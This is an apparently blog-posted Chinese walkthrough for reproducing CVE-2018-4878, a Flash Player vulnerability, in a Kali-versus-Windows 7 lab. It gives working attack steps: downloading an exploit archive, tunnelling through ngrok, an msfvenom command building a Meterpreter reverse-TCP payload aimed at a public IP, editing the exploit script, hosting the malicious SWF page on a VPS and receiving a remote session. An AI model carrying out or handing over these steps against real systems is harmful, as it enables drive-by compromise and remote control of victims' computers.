前言:

CVE-2018-4878利用flash的漏洞来进行攻击,如果受害者的flash版本在28.0.0.137及其之前,那么攻击者可以通过诱使受害者点击链接访问特定网页来控制受害者的电脑。

1 漏洞影响范围

Flash Player28.0.0.137及以前的所有版本

2 漏洞复现

2.1 测试环境

攻击机:kali2017

靶机:win7_x64+IE8+FLASH_player28.0.0.137

 

2.2 复现过程

1.在github上面下载cve-2018-4878的exp并解压

wget https://raw.githubusercontent.com/backlion/demo/master/CVE-2018-4878.rar

CVE-2018-4878的复现-LMLPHP 

CVE-2018-4878的复现-LMLPHP

2.用ngrok配置内网穿透

CVE-2018-4878的复现-LMLPHP

这里的作用是将tcp://0.tcp.ngrok.io:10270的流量转发到本地的1234端口

我们再ping一下得到ip

CVE-2018-4878的复现-LMLPHP

3.用msfvenom生成shellcode

msfvenom -p windows/meterpreter/reverse_tcp lhost=52.14.61.47 lport=10270 -f python>/var/shellcode.txt

 

CVE-2018-4878的复现-LMLPHP

4.修改exp

复制我们生成的shellcode

CVE-2018-4878的复现-LMLPHP

用vim打开我们的cve-2018-4878.py,然后用我们刚才生成的shellcode替换开头的shellcode

CVE-2018-4878的复现-LMLPHP

然后将stageless的值改为false

CVE-2018-4878的复现-LMLPHP

修改文件路径为我们的解压路径

CVE-2018-4878的复现-LMLPHP

然后将解压路径下的exp测试弹出文件夹下的index.html和exploit.swf复制到解压路径

然后运行python cve-2018-4878.py

CVE-2018-4878的复现-LMLPHP

5.msf配置监听

运行msfconsole

CVE-2018-4878的复现-LMLPHP

然后设置paylaod,监听地址,监听端口

CVE-2018-4878的复现-LMLPHP

等待肉鸡上线

 

6.复制文件到vps上面,用靶机访问,完成复现

我们可以通过winscp将我们生成的exploit.swf和index.html复制到vps的html目录下

然后用靶机访问页面

CVE-2018-4878的复现-LMLPHP

然后会返回一个session

CVE-2018-4878的复现-LMLPHP

然后可以通过sessions -i命令进入meterpreter

CVE-2018-4878的复现-LMLPHP

复现成功

 

10-07 10:41